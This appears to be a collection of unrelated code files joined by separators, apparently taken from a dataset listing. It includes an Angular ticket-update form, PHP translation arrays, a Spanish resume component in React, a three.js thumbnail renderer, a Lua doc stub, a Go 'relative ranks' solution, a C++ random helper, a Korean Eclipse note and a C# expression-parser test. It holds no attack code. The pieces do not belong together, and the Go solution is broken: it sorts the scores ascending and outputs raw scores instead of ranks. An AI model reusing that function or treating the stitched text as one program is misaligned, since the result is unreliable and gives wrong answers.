  constructor(private formBuilder: FormBuilder,
              private route: ActivatedRoute,
              private ticketService: TicketsService,
              private toasterService: ToasterService,
              private validationService: ValidationService,
              private router: Router) { }

  /**
   * Fetches the ticket identified by the route and builds the reactive form.
   * `etat` is disabled so the state cannot be edited from this screen.
   */
  ngOnInit() {
    this.ticketID = this.route.snapshot.paramMap.get('id');
    this.ticketService.getTicketById(this.ticketID).subscribe(
      (bodyResponse) => { this.loadTicketData(bodyResponse); }
    );
    this.ticketUpdateForm = this.formBuilder.group({
      objet: ['', Validators.required],
      element: ['', Validators.required],
      nom: ['', Validators.required],
      etat: [{value: '', disabled: true}, Validators.required],
      date_d_ouverture: ['', Validators.required],
      date_d_echeance: ['', Validators.required],
      categorie: ['', Validators.required],
      impact: ['', Validators.required],
      lieu: ['', Validators.required],
      commentaire: ['', ],
      num_agence: ['', ],
      departement: ['', ],
      description: ['', Validators.required]
    });
  }

  /** Copies the fetched ticket payload into the form controls. */
  loadTicketData(bodyResponse) {
    const data = bodyResponse.data;
    this.ticketUpdateForm.patchValue(data);
  }

  /** Remembers the first file of a file-input selection (no-op when empty). */
  changeSelectedFile(files) {
    if (files.length === 0) {
      return;
    }
    this.file = files[0];
  }

  // convenience getter for easy access to form fields
  get f() { return this.ticketUpdateForm.controls; }

  /**
   * Validates the form and sends the update, attaching the selected file
   * when present. Uses POST with a `_method=put` override field.
   */
  onSubmit() {
    this.submitted = true;
    // stop here if form is invalid
    if (this.ticketUpdateForm.invalid) {
      return;
    }
    // Build the multipart request body.
    const requestBody = new FormData();
    // Method spoofing: the backend treats this POST as a PUT.
    requestBody.append('_method', 'put');
    // Disabled controls (etat) still expose .value via get(), so this loop
    // reproduces the previous field-by-field appends exactly.
    for (const field of TicketUpdateComponent.FORM_FIELDS) {
      requestBody.append(field, this.ticketUpdateForm.get(field).value);
    }
    if (this.file !== undefined && this.file !== null) {
      requestBody.append('file', this.file, this.file.name);
    }
    this.ticketService.updateTicket(this.ticketID, requestBody).subscribe(
      (bodyResponse) => { this.processResponse(bodyResponse); },
      (error) => { this.validationService.showValidationsMessagesInToast(error); }
    );
  }

  /** Shows a success toast and navigates back to the ticket list. */
  processResponse(bodyResponse) {
    this.toasterService.pop('success', 'Ticket modifiée:', bodyResponse.message);
    this.router.navigate(['/home/tickets/index']);
  }
}
|
<?php

// Language lines: labels reused across address forms.
return [
    'same_as_above' => 'Same as Above',
];
|
import React from "react";
export default () => (
<div className="w-100">
<h2 className="mb-3">EDUCACIÓN</h2>
<div className="resume-item d-flex flex-column flex-md-row justify-content-between">
<div className="resume-content">
<h3 className="mb-0 h5">Maestría en Gestión de Tecnologías de la información.</h3>
<div className="mb-3">
Universidad Tecmilenio. <span className="text-primary">Titulado</span>
</div>
</div>
<div className="resume-date text-md-right">
<span className="text-primary">Diciembre de 2016 - Diciembre de 2018.</span>
</div>
</div>
<div className="resume-item d-flex flex-column flex-md-row justify-content-between">
<div className="resume-content">
<h3 className="mb-0 h5">Ingeniería en Tecnologías de la Información</h3>
<div className="mb-3">
Universidad Tecnológica de Puebla. <span className="text-primary">Titulado</span>
</div>
</div>
<div className="resume-date text-md-right">
<span className="text-primary">Septiembre de 2009 - Julio de 2015.</span>
</div>
</div>
<div className="resume-item d-flex flex-column flex-md-row justify-content-between">
<div className="resume-content">
<h3 className="mb-0 h5">TSU en Informática, especialidad en programación</h3>
<div className="mb-3">
Universidad Tecnológica de Puebla. <span className="text-primary">Titulado</span>
</div>
</div>
<div className="resume-date text-md-right">
<span className="text-primary"> Julio de 2003 - Septiembre de 2005.</span>
</div>
</div>
</div>
)
|
import { Engine } from '@xrengine/engine/src/ecs/classes/Engine'
import {
Scene,
AmbientLight,
DirectionalLight,
PerspectiveCamera,
Box3,
Vector3,
MeshStandardMaterial,
Mesh,
WebGLRenderer
} from 'three'
import { traverseMaterials } from '../functions/materials'
import { getCanvasBlob } from '../functions/thumbnails'
import makeRenderer from './makeRenderer'
/**
 * Renders a mesh into an off-screen WebGL canvas to produce thumbnail images.
 */
export default class ThumbnailRenderer {
static instance: ThumbnailRenderer
renderer: WebGLRenderer
constructor() {
// 512x512 default; generateThumbnail resizes per call
this.renderer = makeRenderer(512, 512)
}
/**
 * Renders `object` into a throwaway scene with ambient + directional lighting,
 * frames it with a camera fitted to the object's bounding box, and returns the
 * canvas contents as a Blob (via getCanvasBlob).
 *
 * NOTE(review): `scene.add(object)` reparents the mesh into the temporary
 * scene, so any previous parent loses it -- confirm callers pass detached
 * meshes (or re-add afterwards).
 */
generateThumbnail = async (object: Mesh, width = 256, height = 256) => {
const scene = new Scene()
const camera = new PerspectiveCamera()
const light1 = new AmbientLight(0xffffff, 0.3)
const light2 = new DirectionalLight(0xffffff, 0.8 * Math.PI)
light2.position.set(0.5, 0, 0.866)
scene.add(object)
scene.add(light1)
scene.add(light2)
scene.add(camera)
// Give standard / spec-gloss materials the engine's environment map so the
// thumbnail lighting matches the in-engine look. Mutates the materials.
traverseMaterials(object, (material: MeshStandardMaterial) => {
if (material.isMeshStandardMaterial || (material as any).isGLTFSpecularGlossinessMaterial) {
material.envMap = Engine.scene.environment
material.needsUpdate = true
}
})
object.updateMatrixWorld()
// Fit near/far planes and camera position to the object's bounding sphere
const box = new Box3().setFromObject(object)
const size = box.getSize(new Vector3()).length()
const center = box.getCenter(new Vector3())
camera.near = size / 100
camera.far = size * 100
camera.aspect = width / height
camera.updateProjectionMatrix()
// Offset the camera diagonally from the center, then aim back at it
camera.position.copy(center)
camera.position.x += size
camera.position.y += size / 2
camera.position.z += size
camera.lookAt(center)
// skip objects placed on layer 1 (presumably editor-only helpers -- confirm)
camera.layers.disable(1)
this.renderer.setSize(width, height, true)
this.renderer.render(scene, camera)
return getCanvasBlob(this.renderer.domElement)
}
}
|
---
title: cross_zone_move_instance_by_group_id
searchTitle: Lua EQ cross_zone_move_instance_by_group_id
weight: 1
hidden: true
menuTitle: cross_zone_move_instance_by_group_id
---
## cross_zone_move_instance_by_group_id
```lua
eq.cross_zone_move_instance_by_group_id(number group_id, uint16 instance_id) -- void
```
|
package solution
import (
"sort"
"strconv"
)
func findRelativeRanks(nums []int) []string {
rsu := []string{"Gold Medal", "Silver Medal", "Bronze Medal"}
switch len(nums) {
case 0:
return []string{}
case 1:
return rsu[:1]
case 2:
return rsu[:2]
case 3:
return rsu[:3]
}
sort.Slice(nums, func(i, j int) bool {
return nums[i] < nums[j]
})
for i := 3; i < len(nums); i++ {
rsu = append(rsu, strconv.Itoa(nums[i]))
}
return rsu
}
|
#include <chrono>
#include <random>
#include "maze/utils.h"
namespace utils {

// Returns a uniformly distributed integer in [lower, upper] (both inclusive).
//
// The previous version constructed and clock-seeded a fresh
// std::default_random_engine on every call, so calls landing within the same
// clock tick produced identical "random" values. The engine is now seeded
// once per thread from std::random_device and reused.
int random_integer(int lower, int upper) {
  static thread_local std::mt19937 generator{std::random_device{}()};
  std::uniform_int_distribution<int> distribution(lower, upper);
  return distribution(generator);
}

}  // namespace utils
|
<?php
/**
 * Created by PhpStorm.
 * User: LEM
 * Date: 05/01/2016
 * Time: 15:11
 *
 * French UI translation strings, keyed by message identifier.
 * Keys are part of the public interface and must not be renamed
 * (note: 'emailAdress' is misspelled but referenced elsewhere).
 */
return [
    'tag' => 'Mots Clés: ',
    'noTag' => 'Aucun mot clé:',
    'category' => 'Catégorie: ',
    'noCategory' => 'Pas de catégorie',
    'emailAdress' => 'Adresse mail',
    'emailContent' => 'Votre message',
    'password' => 'Mot de passe',
    'remember' => 'Se souvenir',
    'contactSuccess' => 'Votre message a été envoyé avec succès',
    // Fixed user-facing misspelling: "Acceuil" -> "Accueil".
    'home' => 'Accueil',
    'price' => 'Prix: ',
    'dateCreate' => 'Créé le: ',
    'score' => 'Nombre de ventes: ',
    'backHome' => 'Home',
    'dashboard' => 'Dashboard',
    'history' => 'History',
    'logout' => 'logout',
    'login' => 'login',
    'admin' => 'admin',
    'noAuth' => 'login ou mot de passe incorrect',
];
|
---
toc: true
title: " Eclipse 관련 모음"
description: "Eclipse 관련 모음"
categories: [Eclipse]
tags: [Eclipse]
redirect_from:
- /2019/05/31/
---
> Eclipse 관련 모음
### Eclipse JVM 경로 설정 -vm 옵션 in eclipse.ini file {#toc1}
```md
반드시 실행파일명을 포함한 전체경로를 적어야 한다.
-product, --launcher.* 가 있는 라인 이후, -vmargs 라인의 이전에 기입
--launcher.defaultAction
openFile
-vm
D:\JAVA\bin\javaw.exe
-vmargs
-Dosgi.requiredJavaVersion=1.7
```
[^1]: This is a footnote.
[kramdown]: https://kramdown.gettalong.org/
[My Blog]: https://marindie.github.io
|
using System.Globalization;
using sly.lexer;
using sly.parser.generator;
namespace ParserTests.Issue259
{
/// <summary>
/// Expression grammar for sly's expression-parser generator (regression test
/// for issue 259). Each production returns a parenthesized string rendering
/// of the parse so tests can assert on operator precedence/associativity.
/// Precedence levels (higher binds tighter): unary minus 17, * / 15, + - 14,
/// comparison 12, NOT 11, bitwise AND 10, bitwise OR 8, logical AND 7,
/// logical OR 6.
/// </summary>
public class Issue259Parser
{
// ON/OFF literals pass through as their raw token text.
[Operand]
[Production("logical_literal: OFF")]
[Production("logical_literal: ON")]
public string LiteralBool(Token<Issue259ExpressionToken> token)
{
return token.Value;
}
// Hex numbers are kept verbatim (no numeric normalization).
[Operand]
[Production("primary: HEX_NUMBER")]
public string NumericExpressionFromLiteralNumber(Token<Issue259ExpressionToken> offsetToken)
{
return offsetToken.Value;
}
// Decimal numbers are round-tripped through double.Parse with the invariant
// culture, which normalizes the textual form (e.g. trailing zeros).
[Operand]
[Production("primary: DECIMAL_NUMBER")]
public string NumericExpressionFromDecimalNumber(Token<Issue259ExpressionToken> offsetToken)
{
var text = offsetToken.Value;
var value = double.Parse(text, CultureInfo.InvariantCulture);
return value.ToString(CultureInfo.InvariantCulture);
}
// Binary arithmetic / bitwise operators, all left-associative.
[Infix((int)Issue259ExpressionToken.PLUS, Associativity.Left, 14)]
[Infix((int)Issue259ExpressionToken.MINUS, Associativity.Left, 14)]
[Infix((int)Issue259ExpressionToken.TIMES, Associativity.Left, 15)]
[Infix((int)Issue259ExpressionToken.DIVIDE, Associativity.Left, 15)]
[Infix((int)Issue259ExpressionToken.BITWISE_AND, Associativity.Left, 10)]
[Infix((int)Issue259ExpressionToken.BITWISE_OR, Associativity.Left, 8)]
public string NumberExpression(string lhs, Token<Issue259ExpressionToken> token, string rhs)
{
return $"({lhs} {token.Value} {rhs})";
}
// Logical AND/OR bind loosest of all operators.
[Infix((int)Issue259ExpressionToken.LOGICAL_AND, Associativity.Left, 7)]
[Infix((int)Issue259ExpressionToken.LOGICAL_OR, Associativity.Left, 6)]
public string LogicalExpression(string lhs, Token<Issue259ExpressionToken> token, string rhs)
{
return $"({lhs} {token.Value} {rhs})";
}
// Unary minus binds tightest (17).
[Prefix((int)Issue259ExpressionToken.MINUS, Associativity.Right, 17)]
public string NumericExpression(Token<Issue259ExpressionToken> _, string child)
{
return $"-{child}";
}
// We want NOT to bind tighter than AND/OR but looser than numeric comparison operations
[Prefix((int)Issue259ExpressionToken.NOT, Associativity.Right, 11)]
public string LogicalExpression(Token<Issue259ExpressionToken> _, string child)
{
return $"(NOT {child})";
}
// Comparison operators sit between arithmetic (14/15) and NOT (11).
[Infix((int)Issue259ExpressionToken.COMPARISON, Associativity.Left, 12)]
public string Comparison(string lhs, Token<Issue259ExpressionToken> token, string rhs)
{
return $"({lhs} {token.Value} {rhs})";
}
// Local variable references pass through verbatim.
[Operand]
[Production("numeric_literal: LVAR")]
public string Lvar(Token<Issue259ExpressionToken> token)
{
return token.Value;
}
// Simvar tokens look like "A:Name, Type"; the "[2..]" slice strips the
// two-character prefix before splitting name and type on the comma.
[Operand]
[Production("numeric_literal: SIMVAR")]
public string SimVarExpression(Token<Issue259ExpressionToken> simvarToken)
{
var text = simvarToken.Value[2..];
var bits = text.Split(",");
var varName = bits[0];
var type = bits[1].Trim();
return $"A:{varName}, {type}";
}
// Parenthesized sub-expressions simply forward the inner rendering.
[Operand]
[Production("group : LPAREN Issue259Parser_expressions RPAREN")]
public string Group(Token<Issue259ExpressionToken> _1, string child, Token<Issue259ExpressionToken> _2)
{
return child;
}
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.